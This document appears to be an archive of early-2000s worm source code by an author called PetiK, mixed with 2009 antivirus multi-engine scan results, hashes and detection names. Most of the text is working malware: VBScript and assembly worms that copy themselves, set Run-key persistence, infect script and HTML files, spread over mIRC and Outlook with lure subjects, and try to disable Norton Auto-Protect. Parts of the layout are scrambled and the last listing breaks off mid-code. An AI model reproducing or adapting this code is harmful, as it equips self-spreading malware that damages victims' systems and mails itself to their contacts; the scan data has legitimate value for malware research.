2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result IRC-Worm.DOS.Petik.a!IK Worm/Pestil Worm/Petik.Basti.1 Worm/DOS.Petik IRC/Mircworm.AC Bastille-803 IRC-Worm/Pestil.A IRC-Worm.Bastille.A Worm.IRC.Petik.A IRC.Petik MIRC/Generic Heuristic-1 IRC-Worm.DOS.Petik.a Petik.C IRC-Worm.Bastille.A IRC-Worm.DOS.Petik.a IRC-Worm.DOS.Petik.a IRC/Pestil IRC/Pestil Worm.Petik.Basti.1 Worm:DOS/Pestil Petik DOS/Virus.gen W32/Petik Bastille.A DOSCOM.Virus.IRC-Worm.petik Petik IRC.Worm.gen IRC_PETIK.C Bastille.A

Additional information File size: 858 bytes MD5...: d35715e97081f71ca4df20ad03bc0341 SHA1..: 2c3b51c4a6e0fb54c3ab66446dcce7d5ed61b5de

' Name : VBS.Starmania.A ' Author : PetiK ' Date : May 09th 2001 ' Size : 4566 bytes ' Action : It copies itself to %windir%\Hwinfo.vbs and to %systemroot%\Issetup.vbs. ' It adds to values. The first in the Run key and the second in the RunServices ' key. Then it infects all *.vbs and *.vbe files in differents folder : ' ' C:\WINDOWS \ ' C:\WINDOWS\SYSTEM | ' C:\WINDOWS\TEMP |_ ' C:\WINDOWS\SAMPLES\WSH |- All those name are by default ' C:\WINDOWS\DEKTOP | ' C:\MY DOCUMENTS / ' The virus adds his code at the start of the file. ' ' After it creates a script.ini file to C:\mirc folder. When the current day is ' 15th, the worm displays a message, changes the RegisteredOwner and Registered' Organization by “Starmania” and “PetiK Corpor@tion” and adds some values to ' display a message when the computer start. It changes all days the Start Page ' of Internet Explorer between five differents adresses : ' ' http://www.symantec.com ' http://www.pandasoftware.com ' http://www.avp.ch ' http://www.cia.gov ' http://www.fbi.gov ' ' At the end, it spreads with Outlook. There are three differents subject, body ' and attachments : ' 'First : Subject : New Picture for you ! ' Body : Look at this nice picture attached ' Attacged : NewPic__Cool.jpg.vbs ' 'Second : Subject : LoveLetter Fix ' Body : Protect you against VBS.LoveLetter.Variant ' Attacged : LoveFix.vbs ' 'Third : Subject : How to win a holiday in Paris ' Body : Play at this game attached and win a holiday in Paris ' Attacged : Win_A_Holiday.vbs ' #-------------------- START OF CODE --------------------#

'VBS.Starmania 'Coded by PetiK on 09/05/2001 'Made In France On Error Resume Next Dim f,w,file Set f=CreateObject("Scripting.FileSystemObject") Set w=CreateObject("WScript.Shell") Set file=f.OpenTextFile(WScript.ScriptFullName,1) vbsworm=file.ReadAll START() Sub START() Set win=f.GetSpecialFolder(0) Set sys=f.GetSpecialFolder(1) Set cop=f.GetFile(WScript.ScriptFullName) cop.Copy(win&"\Hwinfo.vbs") cop.Copy(sys&"\Issetup.vbs") run=("HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Hwinfo") runs=("HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Issetup") w.RegWrite run,(win&"\Hwinfo.vbs") w.RegWrite runs,(sys&"\Issetup.vbs") MD=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Shell Folders\Personal") ptk(win) ptk(sys) ptk(f.GetSpecialFolder(2)) ptk(win&"\Samples\Wsh") ptk(win&"\Desktop")

ptk(MD) Worm "" Mess() Raffle() Email() End Sub Function ptk(Folder) If f.FolderExists(Folder) then For each P in f.GetFolder(Folder).Files ext=f.GetExtensionName(P.Name) If ext="vbs" or ext="vbe" Then Set VF=f.OpenTextFile(P.path, 1) mark=VF.Read(14) VF.Close If mark <> "'VBS.Starmania" Then Set VF=f.OpenTextFile(P.path, 1) VC=VF.ReadAll VF.Close VCd=vbsworm & VC Set VF=f.OpenTextFile(P.path,2,True) VF.Write VCd VF.Close End If End If Next End If End Function Function Worm(Path) If Path = "" Then prgfl=w.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir") If f.FileExists("C:\mirc\mirc.ini") Then Path = "C:\mirc" If f.FileExists(prgfl & "\mirc\mirc.ini") Then Path = prgfl & "\mirc" If f.FileExists("C:\mirc32\mirc.ini") Then Path = "C:\mirc32" If f.FileExists(prgfl & "\mirc32\mirc.ini") Then Path = prgfl & "\mirc32" End If If Path <> "" Then Set mirc=f.CreateTextFile(Path & "\script.ini", True) mirc.WriteLine "[script]" mirc.WriteLine "n0=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt } " mirc.WriteLine "n1= /dcc send $nick " & f.GetSpecialFolder(0) &"\Hwinfo.vbs" mirc.WriteLine "n2=}" End If End Function Sub Mess() If Day(Now) = 15 Then w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\StarMania","rundll32 mouse,disable" w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","How are you today ? For my part, I'm fine" w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","VBS.Starman ia" w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOwner","Starmania" w.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RegisteredOrganization","PetiK Corpor@tion" MsgBox "Hi man, it's my new Worm/Virus. It was coded by PetiK in 2001", vbinformation, "VBS.Starmania" End If End Sub Sub Raffle() Randomize lot=Int((5*Rnd)+1) If lot = 1 Then w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.symantec.com" elseif lot = 2 Then w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.pandasoftware.com" elseif lot = 3 Then w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start

Page","http://www.avp.ch" elseif lot = 4 Then w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.cia.gov" elseif lot = 5 Then w.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.fbi.gov" End If End Sub Sub Email() Set O=CreateObject("Outlook.Application") Set mapi=O.GetNameSpace("MAPI") For Each AL In mapi.AddressLists If AL.AddressEntries.Count <> 0 Then For AddListCount = 1 To AL.AddressEntries.Count Set ALE = AL.AddressEntries(AddListCount) Set go = O.CreateItem(0) go.To = ALE.Address Randomize num=Int((3*Rnd)+1) Set c = f.GetFile(WScript.ScriptFullName) If num = 1 then c.Copy(fso.GetSpecialFolder(0)&"\NewPic__Cool.jpg.vbs") go.Subject = "New Picture for you !" go.Body = "Look at this nice picture attached" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"NewPic__Cool.jpg.vbs") elseif num = 2 then c.Copy(fso.GetSpecialFolder(0)&"\LoveFix.vbs") go.Subject = "LoveLetter Fix" go.Body = "Protect you against VBS.LoveLetter.Variant" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"LoveFix.vbs") elseif num = 3 then c.Copy(fso.GetSpecialFolder(0)&"\Win_A_Holiday.vbs") go.Subject = "How to win a holiday in Paris" go.Body = "Play at this game attached and win a holiday in Paris" go.Attachments.Add f.BuildPath(f.GetSpecialfolder(0),"Win_A_Holiday.vbs") End If If go.To <> "" Then go.Send End If Next End If Next End Sub #-------------------- END OF CODE --------------------#End Sub

File Starmania.vbs received on 05.16.2009 19:40:56 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 Result IRC-Worm.VBS.Generic!IK VBS/Starmania.1 Worm/VBS.Generic VBS/StarMania.A@m VBS:MailWorm-gen I-Worm/Petik Generic.ScriptWorm.E9844292 VBS/StarMania.A Worm.VBS-14 IRC-Worm.VBS.Generic modification of VBS.Merlin VBS.Petick. VBS/VBSWG!generic VBS/StarMania.A@m IRC-Worm.VBS.Generic VBS/StarMania.A@mm Generic.ScriptWorm.E9844292 IRC-Worm.VBS.Generic IRC-Worm.VBS.Generic VBS/Chism VBS/Chism Script.Starmania.1 Virus:VBS/Lofix probably unknown SCRIPT mIRC/Gen_VBS VBS.Holiday.A@mm VBS/Starmania VBS.Starma.A Worm.Hopalong VBS/Starmania VBS.ManiaStar.A@mm VBS_GENERIC.009 IRC-Worm.VBS.Generic -

Additional information File size: 4566 bytes MD5...: db45536af4e9a1debccb73111fce3f3f SHA1..: d8dfd047f7ccfba137bd3932c6495d7c0fc88d2e

<-Name : HTML.Bother Author : PetiK Language : HTML/VBS ' It creates on the desktop a file "Hello.txt" with this message : "HTML.Bother by PetiK (06/05/2001)" "A HTML.Worm made in France" ' Creates %SYSDIR%\PetiK.htm ' It infects HTM and HTML files into Personal directory and %WINDIR%\WEB --> <bother> <html><head><title>Patch for Internet Explorer</title></head> <body bgColor=#ffffff> <font face='verdana' color=#ff0000 size='2'>You need ActiveX enabled if you want to see this page. <br>Please open this page again and click accept ActiveX.<br>Internet Explorer</font> <SCRIPT Language=VBScript> On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set ws=CreateObject("WScript.Shell") bureau=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") Set txt=fso.CreateTextFile(bureau&"\Hello.txt") txt.WriteLine "HTML.Bother by PetiK (06/05/2001)" txt.WriteLine "A HTML.Worm made in France" txt.Close start=ws.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page") If start <> fso.GetSpecialFolder(1)&"\PetiK.htm" Then Set htm=fso.CreateTextFile(fso.GetSpecialFolder(1)&"\PetiK.htm",2) htm.WriteLine ("<html><head><title>HTML.Bother</title>") htm.WriteLine ("<body><IFRAME SRC='"+start+"'></IFRAME>") htm.WriteLine ("<font face='verdana' color=blue size='2'>") htm.WriteLine ("<br><br>Hi, you have my Worm.") htm.WriteLine ("<br>It's not dangerous.") htm.WriteLine ("<br>Contact Symantec Corporation (www.symantec.com/avcenter) to disinfect your computer") htm.WriteLine ("</body></html>") htm.Close ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page",fso.GetSpecialFolder(1)&"\PetiK.htm" End If p = Int(Rnd * 30) + 1 If Day(Now()) = p Then WshShell.RegWrite "HKEY_CLASSES_ROOT\htmlfile\DefaultIcon\",fso.GetSpecialFolder(1)&"\SHELL32.dll,69" End If doc=ws.RegRead ("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal") Set FolderObj = FSO.GetFolder(doc) Set FO = FolderObj.Files For each cible in FO ExtName = lcase(FSO.GetExtensionName(cible.Name)) if ExtName = "htm" or ExtName = "html" Then Set vrai = fso.OpenTextFile(cible.path, 1, False) if vrai.readline <> "<bother>" Then vrai.close() Set vrai = fso.OpenTextFile(cible.path, 1, False) htmorg = vrai.ReadAll() vrai.close() Set virus = document.body.createTextRange Set vrai = fso.CreateTextFile(cible.path, True, False) vrai.WriteLine "<bother>" vrai.Write(htmorg) vrai.WriteLine "<bother par PetiK May 9th 2001>" vrai.WriteLine virus.htmltext vrai.Close() else

Real.close() end if end if next Set FolderObj = FSO.GetFolder(fso.GetSpecialFolder(0)&"\WEB") Set FO = FolderObj.Files For each cible in FO ExtName = lcase(FSO.GetExtensionName(cible.Name)) if ExtName = "htm" or ExtName = "html" Then Set vrai = fso.OpenTextFile(cible.path, 1, False) if vrai.readline <> "<bother>" Then vrai.close() Set vrai = fso.OpenTextFile(cible.path, 1, False) htmorg = vrai.ReadAll() vrai.close() Set virus = document.body.createTextRange Set vrai = fso.CreateTextFile(cible.path, True, False) vrai.WriteLine "<bother>" vrai.Write(htmorg) vrai.WriteLine "<bother par PetiK May 9th 2001>" vrai.WriteLine virus.htmltext vrai.Close() else Real.close() end if end if next </SCRIPT> </body> </html>

File Bother.htm received on 05.16.2009 11:20:32 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.15 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 8.950.0.1092 2009.05.15 VBA32 3.12.10.5 2009.05.16 ViRobot 2009.5.15.1737 2009.05.15 VirusBuster 4.6.5.0 2009.05.15 Additional information File size: 3255 bytes MD5...: 915aaf9b61f0d62c1fc2082198b324be SHA1..: e2bf913ffca85e796ecef0564a896625dc748332

Result Virus.VBS.Both!IK HTML/Bother VBS/Both Virus/VBS.VBS VBS/Both.A VBS:Malware-gen VBS/Bother.A VBS.Both.A VBS/Both.A VBS.Startpage-1 VBS.Bother Virus.VBS.Both VBS/Both VBS/Both.A Virus.VBS.Both VBS/Both.A VBS.Both.A Virus.VBS.Both Virus.VBS.Both VBS/Bother VBS/Bother Script.Both Virus:VBS/SYSID VBS/Bother VBS/Both.K VBS.Both.A Univ.A VBS.Bother.A Script.HTML.Both VBS/Bother Virus.VBS.Both (v) VBS.Bother.3180 HTML_BOTHER.A Virus.VBS.Both VBS.Both VBS.Bother.A

comment # Name : I-Worm.Friends Author : PetiK Date : May 13th - May 15th 2001 Action : This worm use a VBS script and Micosoft Outlook to spread. It copies itself to \%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe. It creates a script file for mIRC in C:\mirc ans C:\mirc32. It shows the first time a fake Winzip message box. The worm creates C:\Friends and creates the file maya.vbs to spread. It changes the values : HKLM\Software\Microsoft\Windows\CurrentVersion RegisteredOwner : Maya, Laurent, Etienne RegisteredOrganization : PetiK Corporation On 5th of every month, it shows a message box. #

.386 jumps locals .model flat,stdcall ;KERNEL32.dll extrn WritePrivateProfileStringA:PROC extrn lstrcat:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn ExitProcess:PROC extrn CloseHandle:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetSystemTime:PROC extrn GetWindowsDirectoryA:PROC extrn WinExec:PROC extrn WriteFile:PROC ;USER32.dll extrn MessageBoxA:PROC ;ADVAPI32.dll extrn RegOpenKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC .data szOrig db 50 dup (0) szPTK db 50 dup (0) szWin db 50 dup (0) FileHandle dd ? RegHandle dd ? octets dd ? winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h Copie db "\Iesetup.exe",00h inifile db "\petik",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h VBS db "C:\Friends\maya.vbs",00h DIR db "C:\Friends",00h OWN_D db "RegisteredOwner",00h OWN_S db "Maya, Laurent, Etienne",00h ORG_D db "RegisteredOrganization",00h ORG_S db "PetiK Corporation",00h SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h TITRE db "WinZip Self-Extractor",00h TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file transfer error",00h TITRE2 db "I-Worm.Friends",00h TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah db "",0dh,0ah db "To my friends Maya and Laurent",00h email db "wscript C:\Friends\maya.vbs",00h

FILE_ATTRIBUTE_READONLY CREATE_NEW CREATE_ALWAYS FILE_SHARE_READ GENERIC_WRITE HKEY_LOCAL_MACHINE KEY_SET_VALUE REG_SZ SYSTIME struct wYear WORD wMonth WORD wDayOfWeek WORD wDay WORD wHour WORD wMinute WORD wsecond WORD wMilliseconds WORD SYSTIME ends SystemTime SYSTIME <> petikd: ? ? ? ? ? ? ? ?

equ equ equ equ equ equ equ equ

00000001h 00000001h 00000002h 00000001h 40000000h 80000002h 00000002h 00000001h

db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",00h PETIKTAILLE equ $-petikd mayad: db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe", fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Next',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah MAYATAILLE equ $-mayad .code DEBUT: PREPAR: push call push push call FILE: push push call push push call push push push push push push push call cmp

push 50 offset szCopie GetSystemDirectoryA offset Copie offset szCopie lstrcat 50 ; Create PetiK in \%WINDIR%, a mIRC script offset szPTK GetWindowsDirectoryA offset inifile offset szPTK lstrcat 00h FILE_ATTRIBUTE_READONLY CREATE_NEW 00h FILE_SHARE_READ GENERIC_WRITE offset szPTK ; success ? continue CreateFileA eax,-1

je mov push push push push push call push call MIRC: push push push call push push push call

BDR [FileHandle],eax 00h offset octets PETIKTAILLE offset petikd [FileHandle] WriteFile [FileHandle] CloseHandle 00h offset script1 offset szPTK CopyFileA 00h offset script2 offset szPTK CopyFileA

; or else, jump to label BDR

; the file is create

; copy the file to C:\mirc

; and C:\mirc32

EMAIL: push 00h push offset DIR call CreateDirectoryA ; Create the directory C:\Friends push 00h push FILE_ATTRIBUTE_READONLY push CREATE_ALWAYS push 00h push FILE_SHARE_READ push GENERIC_WRITE push offset VBS call CreateFileA ; and put the VBS file maya.vbs mov [FileHandle],eax push 00h push offset octets push MAYATAILLE push offset mayad push [FileHandle] call WriteFile push [FileHandle] call CloseHandle ENVOIE: push 01h push offset email call WinExec COPIE: push 00h call GetModuleHandleA push 50 push offset szOrig push eax call GetModuleFileNameA push 00h push offset szCopie push offset szOrig call CopyFileA WIN_INI:push 50h push offset szWin call GetWindowsDirectoryA push offset winini push offset szWin call lstrcat push offset szWin push offset szCopie push offset run push offset windows call WritePrivateProfileStringA MESS: push push push push call BDR: push push push push push 10h offset TITRE offset TEXTE 00h MessageBoxA offset RegHandle KEY_SET_VALUE 00h offset SOUS_CLE HKEY_LOCAL_MACHINE

; run this file

; Copy our file ti \%SYSTEM%\Iesetup.exe

; Write to WIN.INI file in run section ; [windows] ; run=\%SYSTEM%\Iesetup.exe

; Show the fake error message

call RegOpenKeyExA push push push push push push call push push push push push push call 02h offset OWN_D offset REG_SZ 00h offset OWN_S [RegHandle] RegSetValueExA 02h offset ORG_D offset REG_SZ 00h offset ORG_S [RegHandle] RegSetValueExA

; Change the name of Registered Owner

; Change the name of Registered Organization

push [RegHandle] call RegCloseKey DATE: push call cmp jne push push push push call FIN: offset SystemTime GetSystemTime [SystemTime.wDay],05h FIN 40h offset TITRE2 offset TEXTE2 00h MessageBoxA

; 5th of the month ?

; Show a messagebox

push 00h call ExitProcess

end DEBUT

File Friends.exe received on 05.16.2009 11:58:15 (CET)

Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0

Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15

Result Email-Worm.Win32.Petik!IK Win32/PetTick.6656 Worm/Petik.15 Worm/Win32.Win32 W32/Malware!543d Win32:PetiK-Friends I-Worm/Petik.B Generic.Malware.IM.34A9CFBA W32.Petik.B W32.PetTick Win32.Petik.6656 Win32/Petik.6656.A W32/Malware!543d Email-Worm.Win32.Petik W32/PetTick.B@mm Generic.Malware.IM.34A9CFBA Email-Worm.Win32.Petik Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM W32/PetTick@MM Worm.Petik.15 Worm:Win32/Petik.B Win32/Petik.B W32/Pet_Tick.6656.B Worm/W32.Petik.6656.C W32/Petik.B VBS.LoveLetter Worm.Mail.Petik.v W32/Petik-B Friends worm W95.Pet_Tick.gen W32/PetTick@MM WORM_PET.TICK.B Win32.Worm.Petik.8192 I-Worm.Win32.PetTick.6656.A VBS.LoveLetter

Additional information File size: 6656 bytes MD5...: 18651c3df28058b96d1297d1568d4fd8 SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8

comment # Name : I-Worm.Mustard Author : PetiK Date : May 10th - 27th Size : 7168 bytes Action : When the worm is first executed, it will create the key HKCU\Software\[PetiK]. After, it will copy itself as Windows\AVUpdate.exe. It alters the run= in the Win.ini file to : run=Windows\AVUpdate.exe. It will try to delete the value "Norton Auto-Protect" in the Run key of registry. If it succeed, he alter "Exclude.dat" so that the VBS file don't analyze by Norton Antivirus. It shows a message box and reboot the computer. Next start, it will creates a VBS worm with the attributes "readonly" and "hidden". On June 17th, it shows a message box. # .386 jumps locals .model flat,stdcall extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn CloseHandle:PROC CopyFileA:PROC CreateFileA:PROC DeleteFileA:PROC ExitProcess:PROC ExitWindowsEx:PROC GetFileAttributesA:PROC GetModuleFileNameA:PROC GetModuleHandleA:PROC GetSystemTime:PROC GetWindowsDirectoryA:PROC lstrcat:PROC MessageBoxA:PROC RegCreateKeyExA:PROC RegOpenKeyExA:PROC RegDeleteValueA:PROC RegQueryValueExA:PROC RegCloseKey:PROC SetFileAttributesA:PROC SetFilePointer:PROC Sleep:PROC WinExec:PROC WriteFile:PROC WritePrivateProfileStringA:PROC

.data FileHandle RegHandle octets regDisp regResu Dist szNOR szOrig szWin Buffer BufferSize run windows Winini Copie filedat email VBS mirc script1 script2 script3 script4 CLE

dd ? dd ? dd ? dd 0 dd 0 dd 0 db 50 dup (0) db 50 dup (0) db 50 dup (0) db 7Fh dup (0) dd 7Fh db "run",00h db "windows",00h db "\\WIN.INI",00h db "\AVUpdate.exe",00h db "\Exclude.dat",00h db "wscript C:\send.vbs",00h db "C:\send.vbs",00h db "C:\Win.sys",00h db "C:\mirc\script.ini",00h db "C:\mirc32\script.ini",00h db "C:\Program Files\mirc\script.ini",00h db "C:\Program Files\mirc32\script.ini",00h db "Software\[PetiK]",00h

TITRE TEXTE CLE_RUN NAV CLE_NOR ValueType Value CREE TITRE2 TEXTE2

db db db db dd db db db db db db db

"Install Information",00h "Please reboot your computer to finish the installation",00h "Software\Microsoft\Windows\CurrentVersion\Run",00h "Norton Auto-Protect",00h db "\Software\Symantec\InstalledApps",00h 00h "NAV",00h "I-Worm.Mustard par PetiK (c)2001",00h db "I-Worm.Mustard",00h db " Coded By PetiK (c)2001 ",0dh,0ah "",0dh,0ah "Small but Pretty",0dh,0ah "I Love You",0dh,0ah "Since January",0dh,0ah "I Think Of You",00h

HKEY_LOCAL_MACHINE equ 80000002h HKEY_CURRNET_USER equ 80000001h KEY_ALL_ACCESS equ 0000003Fh FILE_ATTRIBUTE_READONLY equ 00000001h FILE_ATTRIBUTE_HIDDEN equ 00000002h FILE_ATTRIBUTE_NORMAL equ 00000080h CREATE_NEW equ 00000001h CREATE_ALWAYS equ 00000002h OPEN_EXISTING equ 00000003h FILE_SHARE_READ equ 00000001h GENERIC_WRITE equ 40000000h FILE_END equ 00000002h EWX_REBOOT equ 00000002h EWX_FORCE equ 00000004h SYSTIME struct wYear WORD wMonth wDayOfWeek WORD wDay WORD wHour WORD wMinute wSecond wMillisecond SYSTIME ends SystemTime SYSTIME <> ? WORD ? ? ? WORD WORD WORD

?

? ? ?

mircd: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= ./dcc send $nick " szCopie db 50 dup (0) db "",0dh,0ah db "n3=}",00h MIRCTAILLE equ $-mircd sendd: db 'ENTREE()',0dh,0ah db 'Sub ENTREE',0dh,0ah db 'EMAIL()',0dh,0ah db 'End Sub',0dh,0ah db 'Sub EMAIL()',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'N.To = P.Address',0dh,0ah db 'N.Subject = "AntiVirus Update"',0dh,0ah db 'N.Body = "The last version of your AV"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah db 'N.DeleteAfterSubmit = True',0dh,0ah db 'If N.To <> "" Then',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah

